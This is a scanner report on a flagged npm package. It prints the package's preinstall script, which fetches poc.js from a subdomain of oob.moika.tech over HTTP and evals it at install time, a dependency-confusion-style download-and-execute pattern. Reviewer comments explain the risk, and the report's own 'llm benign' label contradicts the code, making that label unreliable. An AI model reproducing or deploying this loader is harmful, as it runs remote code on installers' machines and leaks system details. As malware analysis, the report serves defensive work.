// npm package
@t-in-one/save_application_hid_to_storage
tbank utilities
weekly
87
monthly
439
versions
1
maintainers
1
license
ISC
first publish
2026-05-04
publisher
t-in-one
tarball
1,174 B
AUTO-PUBLISHED·1 version indexed·latest published 2026-05-04
// offending code· @99.0.7· 1 file flagged
llm: benign · 0.85→ No suspicious destination, no remote-exec shape — 1 other host(s).
- @99.0.7 · AUTO-PUBLISHED · publisher: t-in-one · heuristic 99/100 · static flags 1 · llm benign (0.85) via ollama · install-scripts:preinstall · new-publisher:26d · first-version-of-package · publisher-multi-name-burst:16 · publisher-version-pump:16 · osv-flagged:MAL-2026-3337 · eval-dynamic
→ No suspicious destination, no remote-exec shape — 1 other host(s).
// offending code · 1 file flagged · patterns: 1
--- install scripts ---
### preinstall
node preinstall.js

--- package/preinstall.js (excerpt) ---
// NOTE(review): this file is wired to the npm "preinstall" lifecycle hook
// (see "scripts" in package.json below), so it runs during `npm install`,
// before any code from the package is imported by the consumer.
// What it does, in order: derive the package name and scope, build a hostname
// from them under BASE, fetch /poc.js from that host over plain HTTP, and
// pass the response body to eval(). That is a download-and-execute pattern:
// the code that actually runs is not part of the published tarball.
// Installing with lifecycle scripts disabled (npm's --ignore-scripts, or
// ignore-scripts=true in .npmrc) keeps this file from running at all.
const http = require("http");
const fs = require("fs");
const path = require("path");

// Hard-coded parent domain; every request host below is a subdomain of it.
// Useful as a pivot when searching DNS and proxy logs for affected machines.
const BASE = "oob.moika.tech";

// Package name: taken from the npm_package_name environment variable, else
// read from the package.json sitting next to this script, else "".
const raw = process.env.npm_package_name || (() => {
  try { return JSON.parse(fs.readFileSync(path.join(__dirname, "package.json"), "utf8")).name; } catch(_){}
  return "";
})();

// Scope and bare name are reduced to [a-z0-9-] (case-insensitive) so they can
// be used as DNS labels; an unscoped package gets the fixed scope label "x".
const scope = raw.startsWith("@") ? raw.split("/")[0].slice(1).replace(/[^a-z0-9-]/gi, "-") : "x";
const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-");

// Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)
// NOTE(review): the "safe PoC" description above is the author's claim and
// cannot be checked from this package: poc.js is served at request time, so
// its content can differ per request and is not covered by the tarball hash.
// The hostname embeds the package name and scope, so the DNS lookup and the
// HTTP request each reveal to the server side which package was installed.
// The scheme is http://, so the response is neither encrypted nor
// authenticated in transit.
http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => {
  let body = "";
  // The whole response is buffered as a string, with no check of status code,
  // content type or size.
  res.on("data", chunk => { body += chunk; });
  // Direct eval: the fetched text runs as JavaScript inside this module's
  // scope (http, fs, path and require are all reachable) with the rights of
  // the user running the install. Exceptions from the payload are swallowed.
  res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line
// Network errors are ignored and a timeout only destroys the request, so a
// blocked or failed fetch leaves no visible trace in the install output.
}).on("error", () => {}).on("timeout", function() { this.destroy(); });

--- package.json (entry) ---
{
  "name": "@t-in-one/save_application_hid_to_storage",
  "version": "99.0.7",
  "description": "tbank utilities",
  "main": "index.js",
  "scripts": { "preinstall": "node preinstall.js" },
  "keywords": [ "bug bounty" ],
  "author": "TBank",
  "license": "ISC"
}

--- index.js (entry) ---
// NOTE(review): the package exports nothing; the only code with any effect is
// the preinstall script.
module.exports = {};

--- preinstall.js (entry) ---
// NOTE(review): identical to the excerpt listed above; the same
// fetch-then-eval behaviour at install time applies.
const http = require("http");
const fs = require("fs");
const path = require("path");

const BASE = "oob.moika.tech";

const raw = process.env.npm_package_name || (() => {
  try { return JSON.parse(fs.readFileSync(path.join(__dirname, "package.json"), "utf8")).name; } catch(_){}
  return "";
})();

const scope = raw.startsWith("@") ? raw.split("/")[0].slice(1).replace(/[^a-z0-9-]/gi, "-") : "x";
const pkg = (raw.startsWith("@") ? raw.split("/")[1] : raw).replace(/[^a-z0-9-]/gi, "-");

// Fetches poc.js (safe PoC: whoami/hostname/ifconfig + /etc/passwd only)
http.get(`http://${pkg}.${scope}.${BASE}/poc.js`, { timeout: 8000 }, (res) => {
  let body = "";
  res.on("data", chunk => { body += chunk; });
  res.on("end", () => { try { eval(body); } catch (_) {} }); // jshint ignore:line
}).on("error", () => {}).on("timeout", function() { this.destroy(); });
